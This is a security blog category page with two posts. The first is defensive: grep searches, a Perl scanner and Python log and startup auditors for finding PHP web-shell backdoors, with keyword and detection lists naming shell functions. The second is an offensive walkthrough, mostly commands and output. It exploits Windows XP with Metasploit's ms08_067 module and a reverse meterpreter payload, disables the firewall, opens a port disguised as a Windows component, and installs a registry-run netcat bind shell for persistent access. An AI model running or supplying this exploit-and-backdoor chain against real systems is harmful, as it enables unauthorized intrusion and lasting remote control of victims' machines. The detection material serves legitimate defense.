Archive for the ‘BackDoor’ Category

How to find backdoor PHP shell scripts on a server

June 17, 2012 1 comment

When hackers get access to your website server, they sometimes install a backdoor shell script designed to allow them to regain entry even after you’ve cleaned up the site, repaired the original security hole that allowed the hack to occur, otherwise improved site security, and even installed measures to try to lock the hackers out.

A backdoor script can be called from a browser like any other web page. It gives its user a web page interface where they can download and upload, view or modify files, create directories, and otherwise manage the site using PHP’s ability to read and write files and pass operating system commands through to the operating system.

One way to find these scripts is by searching website access logs for the suspicious lines that can be generated when someone uses the scripts to modify site files.
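As an added example of the log-search approach just described (not part of the original post), a small Python scanner over combined-format access log lines flags successful hits on PHP scripts that sit in upload directories, are missing from a list of known site scripts, or carry shell-style query parameters. The directory list, known-script list, parameter names and sample log lines are all constructed assumptions to tune for your own site.

```python
import re

# Combined log format: host ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) ')

# Assumptions to tune per site: directories that should never execute PHP, the scripts that
# legitimately exist, and query-parameter names typical of a shell driven from a browser
STATIC_DIRS = ("/wp-content/uploads/", "/uploads/", "/images/", "/cache/")
KNOWN_SCRIPTS = {"/index.php", "/wp-login.php", "/wp-admin/admin-ajax.php"}
SHELL_PARAMS = {"cmd", "c", "exec", "command", "upload", "chmod", "mkdir", "dir"}

# Constructed sample log lines (RFC 5737 test addresses), not taken from a real server
SAMPLE_LOG = """\
203.0.113.5 - - [17/Jun/2012:10:01:12 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Jun/2012:10:01:13 +0200] "GET /wp-content/uploads/2012/06/x.php?cmd=ls HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Jun/2012:10:02:40 +0200] "POST /wp-content/uploads/2012/06/x.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jun/2012:10:03:00 +0200] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jun/2012:10:03:05 +0200] "GET /old/shell.php?c=id HTTP/1.1" 404 300 "-" "Mozilla/5.0"
"""

def suspicious_reasons(line):
    """Reasons a log line looks like web-shell use; [] when nothing stands out."""
    m = LOG_RE.match(line)
    if not m or int(m["status"]) >= 400:
        return []                      # unparsable, or the request never reached a script
    url, _, query = m["path"].partition("?")
    url = url.lower()
    if not url.endswith((".php", ".phtml")):
        return []
    reasons = []
    if url.startswith(STATIC_DIRS):
        reasons.append("PHP executed from an upload/static directory")
    if url not in KNOWN_SCRIPTS:
        reasons.append("PHP script not in the site's known list")
    hits = {kv.split("=", 1)[0].lower() for kv in query.split("&") if kv} & SHELL_PARAMS
    if hits:
        reasons.append("shell-style parameter(s): " + ", ".join(sorted(hits)))
    return reasons

def scan_log(text):
    """Group flagged lines by (client IP, script) so one shell session shows as one finding."""
    findings = {}
    for line in text.splitlines():
        reasons = suspicious_reasons(line)
        if reasons:
            m = LOG_RE.match(line)
            findings.setdefault((m["ip"], m["path"].partition("?")[0]), set()).update(reasons)
    return findings
```

Run it as `scan_log(open("access.log").read())` against a real log; a static file request or a 404 probe never produces a finding, only successful hits on a PHP script do.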

Backdoor scripts often need PHP functions that most legitimate scripts don't, so you can search the files in your site for those names with any text-search utility. Keywords to search for:

  • passthru
  • shell_exec
  • system
  • phpinfo
  • base64_decode
  • edoced_46esab
  • chmod
  • mkdir
  • ` (backticks with an operating system command between them)
  • fopen
  • fclose
  • readfile

On a Linux server, the grep program is already installed as part of the operating system. The only problem is figuring out how to launch it.

If you have command line access to your server (SSH), there’s no problem. You can run it from the command line and have the results displayed to you.

Sample text searches for suspicious PHP code.

Do the search once for each of the suggested PHP keywords listed above.

grep -Rn "mkdir *(" public_html/


grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" public_html/

Or we can use the following Perl script (source):

#!/usr/bin/perl -w
# usage: ./ <sensitivity 1-50> <directory to scan>
use strict;
use File::Find;

my $sens   = shift || 10;    # minimum score before a file is reported
my $folder = shift || './';
find(\&backdoor, $folder);

sub backdoor {
    if (/\.(php|txt)/) {
        open(my $IN, '<', $_) or do { warn "cannot open file $File::Find::name: $!\n"; return };
        my @file = <$IN>;
        close $IN;
        # maybe evil stuff: one point per matching line
        my $score = grep(/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid\(|fileperms\(/i, @file);
        # probably evil stuff: fifty points per matching line
        my $tempscore = grep(/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i, @file);
        $score += 50 * $tempscore;
        print "$score - Possible backdoor : $File::Find::name\n" if ($score > $sens - 1);
    }
    elsif (-f $_) {
        # any other regular file: PHP code where none belongs is suspicious on its own
        open(my $IN, '<', $_) or do { warn "cannot open file $File::Find::name: $!\n"; return };
        print "5000 - Possible backdoor (php in non-php file): $File::Find::name\n" if grep(/(\<\?php|include(\ |\())/i, <$IN>);
        close $IN;
    }
}


Web Shell Detection Using NeoPI

Category: BackDoor

Creating a Netcat Backdoor on a Windows XP

June 6, 2012 2 comments

Netcat is a versatile tool that can perform a multitude of TCP/IP functions. One very useful feature, particularly for a penetration tester, is the ability to shovel a shell from one system to another. In this section, we'll use this feature to access a remote backdoor on a Windows XP system whose firewall is turned on. A backdoor is a communication channel that provides a remote command shell on a previously exploited system (the victim), allowing access to the system at a later time. Below I demonstrate several ways to create and use such a backdoor on a Windows XP victim host with its firewall on.

Run the Metasploit console:

       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 869 exploits - 480 auxiliary - 144 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
       =[ svn r15401 updated today (2012.06.07)

Scan the target with nmap

msf > namp
[-] Unknown command: namp.
msf > nmap
[*] exec: nmap
Nmap scan report for
Host is up (0.00s latency).
Not shown: 998 filtered ports
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds    # OPEN !!!

Choose an exploit for the target (Windows XP EN SP2)

Microsoft Server Service Relative Path Stack Corruption

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show targets
Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   6   Windows XP SP3 English (NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)

Choose a payload for the target (Windows XP EN SP2)

msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST
msf  exploit(ms08_067_netapi) > set LHOST

msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST  yes       The target address
   RPORT    445                         yes       Set the SMB service port    # This Port is Open !!!
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread               yes       Exit technique: seh, thread, process, none
   LHOST    yes       The listen address
   LPORT     4444                       yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Exploit (Windows XP EN SP2)

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 2 opened ( -> at 2012-06-07 13:28:59 +0200


meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   # SYSTEM !!!!!
meterpreter > shell
Process 240 created.
Channel 1 created.

Running a shell on Windows XP and disabling the firewall:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>Netsh firewall set opmode disable         # Disable FireWall
Netsh firewall set opmode disable
Ok.                                                           # It's OK - FireWall is OFF

In the next step we return to meterpreter and upload netcat to Windows XP:

meterpreter > upload c:\\tools\\nc.exe c:\\windows\\system32\\   # Upload netcat from my local machine to windows xp
[*] uploading  : c:\tools\nc.exe -> c:\windows\system32\
[*] uploaded   : c:\tools\nc.exe -> c:\windows\system32\\nc.exe   # Upload status – Ok

meterpreter > shell
Process 976 created.
Channel 3 created.

Open a new TCP port, 1234

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show opmode          # show firewall status
netsh firewall show opmode

Domain profile configuration:
Operational mode                  = Enable
Exception mode                    = Enable

Standard profile configuration (current):
Operational mode                  = Disable               # firewall is OFF
Exception mode                    = Enable

Local Area Connection firewall configuration:
Operational mode                  = Enable

C:\WINDOWS\system32>Netsh firewall set opmode mode = enable exceptions = enable profile = all
Netsh firewall set opmode mode = enable exceptions = enable profile = all
Ok.     # Firewall is on and exceptions are enabled

C:\WINDOWS\system32>netsh firewall add portopening TCP 1234 "Windows Firewall Reporting Agent" enable all
netsh firewall add portopening TCP 1234 "Windows Firewall Reporting Agent" enable all
Ok.     # Open TCP port 1234

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Standard profile:
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting   # my new port
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Install the Windows backdoor shell

C:\WINDOWS\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe"

The operation completed successfully  # It's OK!



Now the next time a user logs on to the system, the Netcat backdoor command is triggered and sends a command prompt to our attack system.

And …

wmic:root\cli>startup list full
Command=c:\windows\system32\nc.exe -d -l -p1234 -e cmd.exe  # not hidden
User=All Users
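The startup listing above shows why this persistence is easy to audit from the defender's side. As an added example (not part of the original post), the Python below parses `wmic startup list full` and `netsh firewall show portopening` output in the layout shown on this page, flags autostart commands that listen on a port (`-l`, `-p<port>`) and hand a program to whoever connects (`-e`), and pairs each with the firewall exception that lets it through. Both sample outputs are constructed.

```python
import re

# Constructed sample of `wmic startup list full` output (key=value blocks, as shown above)
STARTUP_OUTPUT = """\
Command=c:\\windows\\system32\\nc.exe -d -l -p1234 -e cmd.exe
Name=nc
User=All Users

Command=C:\\WINDOWS\\system32\\ctfmon.exe
Name=ctfmon.exe
User=All Users
"""

# Constructed sample of `netsh firewall show portopening` output, same layout as above
PORTOPENING_OUTPUT = """\
Port   Protocol  Mode     Name
1234   TCP       Enable   Windows Firewall Reporting
139    TCP       Enable   NetBIOS Session Service
"""

def parse_startup(text):
    """Split wmic output into one dict of key=value fields per startup entry."""
    return [dict(l.split("=", 1) for l in block.splitlines() if "=" in l)
            for block in re.split(r"\n\s*\n", text.strip())]

def listener_facts(command):
    """(port, program) when the command listens (-l, -p<port>) and hands a program to the client (-e)."""
    toks = command.split()
    port, prog = "", None
    for i, t in enumerate(toks):
        if t.startswith("-p"):
            port = t[2:] or (toks[i + 1] if i + 1 < len(toks) else "")
        elif t == "-e" and i + 1 < len(toks):
            prog = toks[i + 1]
    return (int(port), prog) if "-l" in toks and port.isdigit() and prog else None

def parse_portopening(text):
    """Map (port, protocol) of every enabled exception to the name netsh shows for it."""
    rows = re.findall(r"^(\d+)\s+(TCP|UDP)\s+(\w+)\s+(.+?)\s*$", text, re.M)
    return {(int(p), proto): name for p, proto, mode, name in rows if mode.lower() == "enable"}

def audit(startup_text, portopening_text):
    """Pair every autostart listener with the firewall exception (if any) that lets clients reach it."""
    exceptions = parse_portopening(portopening_text)
    findings = []
    for entry in parse_startup(startup_text):
        facts = listener_facts(entry.get("Command", ""))
        if facts:
            findings.append({"name": entry.get("Name"), "port": facts[0], "spawns": facts[1],
                             "firewall_exception": exceptions.get((facts[0], "TCP"))})
    return findings
```

On a live host, feed it the saved output of the two commands; an exception named after a plausible Windows component, as in this post, is exactly why the port-to-Run-entry correlation matters more than the exception's name.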

Working or not?

From another machine, run:

c:\tools>nc -v 1234
CASH-F32CDFF50A [] 1234 (?) open

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\metasploit>

It’s working !!!


Categories: BackDoor, FireWall